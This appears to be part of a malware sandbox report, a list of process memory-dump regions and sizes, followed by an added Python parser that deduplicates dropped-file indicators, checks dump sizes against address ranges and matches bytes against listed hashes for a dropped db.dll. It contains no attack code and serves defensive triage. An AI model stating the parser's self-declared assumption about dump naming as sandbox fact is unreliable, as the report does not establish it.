memory/3944-322-0x00000289ED9F9000-0x00000289ED9FF000-memory.dmp
Filesize 24KB
-
memory/3944-321-0x00007FF809730000-0x00007FF80A1F1000-memory.dmp
Filesize 10.8MB
-
memory/3948-264-0x0000000000000000-mapping.dmp
-
memory/3968-181-0x0000000000000000-mapping.dmp
-
memory/4008-312-0x0000000000000000-mapping.dmp
-
memory/4028-252-0x0000000000000000-mapping.dmp
-
memory/4032-230-0x0000000000000000-mapping.dmp
-
memory/4036-272-0x0000000000000000-mapping.dmp
-
memory/4048-167-0x0000000000000000-mapping.dmp
-
memory/4048-170-0x0000000140000000-0x000000014061A000-memory.dmp
Filesize 6.1MB
-
memory/4152-193-0x0000000000000000-mapping.dmp
-
memory/4152-201-0x0000000000400000-0x0000000002B93000-memory.dmp
Filesize 39.6MB
-
memory/4152-196-0x0000000002CFE000-0x0000000002D11000-memory.dmp
Filesize 76KB
-
memory/4152-197-0x0000000004790000-0x0000000004799000-memory.dmp
Filesize 36KB
-
memory/4152-228-0x0000000000400000-0x0000000002B93000-memory.dmp
Filesize 39.6MB
-
memory/4156-177-0x0000000000000000-mapping.dmp
-
memory/4208-332-0x0000020DA2B40000-0x0000020DA2B60000-memory.dmp
Filesize 128KB
-
memory/4208-331-0x00007FF6B52E0000-0x00007FF6B5AD4000-memory.dmp
Filesize 8.0MB
-
memory/4208-330-0x0000020DA2B60000-0x0000020DA2BA0000-memory.dmp
Filesize 256KB
-
memory/4208-329-0x00007FF6B52E0000-0x00007FF6B5AD4000-memory.dmp
Filesize 8.0MB
-
memory/4208-325-0x00007FF6B5AD2720-mapping.dmp
-
memory/4208-326-0x0000020D922D0000-0x0000020D922F0000-memory.dmp
Filesize 128KB
-
memory/4216-232-0x0000000000400000-0x0000000000471000-memory.dmp
Filesize 452KB
-
memory/4216-207-0x0000000051490000-0x0000000051522000-memory.dmp
Filesize 584KB
-
memory/4216-202-0x0000000000400000-0x0000000000472000-memory.dmp
Filesize 456KB
-
memory/4216-206-0x0000000000400000-0x0000000000471000-memory.dmp
Filesize 452KB
-
memory/4216-198-0x0000000000000000-mapping.dmp
-
memory/4268-132-0x0000000000900000-0x00000000010FA000-memory.dmp
Filesize 8.0MB
-
memory/4356-248-0x0000000000000000-mapping.dmp
-
memory/4356-306-0x0000000000000000-mapping.dmp
-
memory/4420-317-0x0000000000000000-mapping.dmp
-
memory/4608-184-0x0000000000000000-mapping.dmp
-
memory/4668-257-0x0000000000000000-mapping.dmp
-
memory/4712-266-0x0000000000000000-mapping.dmp
-
memory/4748-310-0x0000000000000000-mapping.dmp
-
memory/4776-249-0x00007FF809330000-0x00007FF809DF1000-memory.dmp
Filesize 10.8MB
-
memory/4776-267-0x00007FF809330000-0x00007FF809DF1000-memory.dmp
Filesize 10.8MB
-
memory/4804-323-0x00007FF601A214E0-mapping.dmp
-
memory/4832-163-0x0000000000000000-mapping.dmp
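The listing above is a flattened sandbox table: the "Filesize" label is fused to each dropped-file path or dump name, hash labels are fused to their hex digits, the same drop is repeated several times with identical hashes, and each memory-dump name encodes the region's address range, from which the listed size follows (end minus start). The parser below is an added example written for this page; it is not part of the report or of any sandbox tool. It reads that format, collapses identical re-drops into one indicator with a count, recovers each region dump's size from its start and end addresses and checks it against the listed size, and tests arbitrary bytes against every hash the report lists for a dropped file. The sample text is constructed from a few entries on this page; reading the two numbers in a dump name as process id and event sequence number is an assumption about the sandbox's naming, not something the report states.

```python
# Added example: parser/checker for the flattened artefact listing format above.
import hashlib
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# memory/<pid>-<seq>-0x<start>[-0x<end>]-(memory|mapping).dmp.  Reading the two
# numbers as process id and event sequence is an assumption, not report fact.
MEM_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"(?:-0x(?P<end>[0-9A-Fa-f]+))?-(?P<kind>memory|mapping)\.dmp$")
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

@dataclass
class MemDump:
    pid: int
    seq: int
    start: int
    size: Optional[int]           # None for a "mapping" dump (single address)
    listed: Optional[str] = None  # size string the report shows, e.g. "42.5MB"

@dataclass
class DroppedFile:
    path: str
    listed: str
    hashes: Dict[str, str]
    times_listed: int = 1

def human_size(n: int) -> str:
    """Report units: whole KiB below 1 MiB, otherwise MiB with one decimal."""
    return f"{n // 1024}KB" if n < (1 << 20) else f"{n / (1 << 20):.1f}MB"

def parse_memory_name(name: str) -> Optional[MemDump]:
    m = MEM_RE.match(name)
    if m is None:
        return None
    start = int(m["start"], 16)
    size = int(m["end"], 16) - start if m["end"] else None
    return MemDump(int(m["pid"]), int(m["seq"]), start, size)

def parse_listing(text: str) -> Tuple[List[DroppedFile], List[MemDump]]:
    """Entries are separated by '-' lines: line 1 is a path or dump name (the
    'Filesize' label may be glued on), line 2 the listed size, the rest hash
    lines whose label may be glued to the hex.  Identical re-drops are counted."""
    files: Dict[str, DroppedFile] = {}
    dumps: List[MemDump] = []
    for block in text.split("\n-\n"):
        lines = [ln.strip() for ln in block.splitlines() if ln.strip()]
        if not lines:
            continue
        head = lines[0][:-8] if lines[0].endswith("Filesize") else lines[0]
        listed = "".join(lines[1].replace("Filesize", "").split()) if len(lines) > 1 else None
        dump = parse_memory_name(head)
        if dump is not None:
            dump.listed = listed
            dumps.append(dump)
            continue
        hashes: Dict[str, str] = {}
        for ln in lines[2:]:
            compact = "".join(ln.split())
            for label, hexlen in HEX_LEN.items():
                if compact.startswith(label) and len(compact) == len(label) + hexlen:
                    hashes[label] = compact[len(label):].lower()
                    break
        key = hashes.get("SHA256", head)   # same bytes at the same path: one IOC
        if key in files:
            files[key].times_listed += 1
        else:
            files[key] = DroppedFile(head, listed or "", hashes)
    return list(files.values()), dumps

def size_mismatches(dumps: List[MemDump]) -> List[MemDump]:
    """Region dumps whose listed size is not end-start (mapping dumps have none)."""
    return [d for d in dumps if d.size is not None and d.listed
            and human_size(d.size) != d.listed]

def hashes_match(data: bytes, f: DroppedFile) -> bool:
    """True if data matches every hash the report lists for the dropped file."""
    return bool(f.hashes) and all(
        hashlib.new(alg.lower(), data).hexdigest() == h for alg, h in f.hashes.items())

# Constructed sample: entries copied from the listing above in its flattened form.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\db.dllFilesize
52KB
MD50b35335b70b96d31633d0caa207d71f9
SHA1996c7804fe4d85025e2bd7ea8aa5e33c71518f84
SHA256ec01d244074f45d4f698f5713147e99d76053824a648b306e1debf69f3ba9ce6
SHA512ab3d770e99b3f379165863808f3ffc55d64d8e9384a158e6695d7325e97fa1bb570c5088ccdc1d2c3b90df5be11d6722ede15e7b6552bf90e748cb9c28ab94ce
-
C:\Users\Admin\AppData\Local\Temp\db.dllFilesize
52KB
MD50b35335b70b96d31633d0caa207d71f9
SHA1996c7804fe4d85025e2bd7ea8aa5e33c71518f84
SHA256ec01d244074f45d4f698f5713147e99d76053824a648b306e1debf69f3ba9ce6
SHA512ab3d770e99b3f379165863808f3ffc55d64d8e9384a158e6695d7325e97fa1bb570c5088ccdc1d2c3b90df5be11d6722ede15e7b6552bf90e748cb9c28ab94ce
-
memory/520-245-0x0000000000400000-0x0000000002E81000-memory.dmpFilesize
42.5MB
-
memory/64-203-0x0000000000000000-mapping.dmp
"""
```

Feed the page's full listing to `parse_listing` to get one `DroppedFile` per distinct hash set with its repeat count, and one `MemDump` per dump. A region such as 0x0000000000400000-0x0000000002E81000 is 0x2A81000 bytes, which `human_size` renders as the report's "42.5MB"; `size_mismatches` flags any listed size that does not agree with its address range, and mapping dumps, which carry a single address, are skipped.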